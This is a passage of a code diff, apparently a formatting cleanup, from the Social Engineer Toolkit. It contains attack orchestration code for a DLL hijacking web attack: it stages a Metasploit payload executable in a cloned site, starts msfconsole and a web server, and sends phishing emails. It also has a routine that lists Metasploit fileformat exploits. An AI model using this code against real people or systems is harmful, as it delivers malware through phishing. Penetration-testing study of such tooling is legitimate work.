except: import smtp_client reload(smtp_client)
except:
import smtp_client
# start the dll_hijacking stuff here # start the dll_hijacking stuff here
if exploit == "dll_hijacking": if exploit == "dll_hijacking":
sys.path.append("src/core/payloadgen") sys.path.append("src/core/payloadgen")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1) debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try: reload(create_payloads) try:
except: import create_payloads reload(create_payloads)
except:
import create_payloads
sys.path.append("src/webattack/dll_hijacking") sys.path.append("src/webattack/dll_hijacking")
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1) debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
try: reload(hijacking) try:
except: import hijacking reload(hijacking)
except:
import hijacking
# if we are not using apache # if we are not using apache
if apache == 0: if apache == 0:
@ -268,31 +293,37 @@ if exploit == "dll_hijacking":
filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
filewrite.close() filewrite.close()
time.sleep(1) time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python src/html/web_server.py") child = pexpect.spawn("python src/html/web_server.py")
# except: child.close() # except: child.close()
# if we are using apache # if we are using apache
if apache == 1: if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait() subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(setdir + "/meta_config"):
# if we aren't using the infectious method then do normal routine # if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (setdir)):
print_info("This may take a few to load MSF...") print_info("This may take a few to load MSF...")
try: try:
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir)) child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir))
except: except:
try: try:
child1.close() child1.close()
except: pass except:
pass
# get the emails out # get the emails out
# if we aren't using the infectious method then do the normal routine # if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (setdir)):
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: reload(smtp_client) try:
except: import smtp_client reload(smtp_client)
except:
import smtp_client
try: try:
child1.interact() child1.interact()
except: except:
@ -300,4 +331,5 @@ if exploit == "dll_hijacking":
try: try:
child.close() child.close()
child1.close() child1.close()
except: pass except:
pass

View file

@ -8,8 +8,11 @@ me = mod_name()
sys.path.append("src/core") sys.path.append("src/core")
debug_msg(me, "re-importing 'src.core.setcore'", 1) debug_msg(me, "re-importing 'src.core.setcore'", 1)
try: reload(setcore) try:
except: import setcore reload(setcore)
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]" except:
generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait() import setcore
print "[---] Database is now up-to-date [---]" print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
generate_list = subprocess.Popen(
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print("[---] Database is now up-to-date [---]")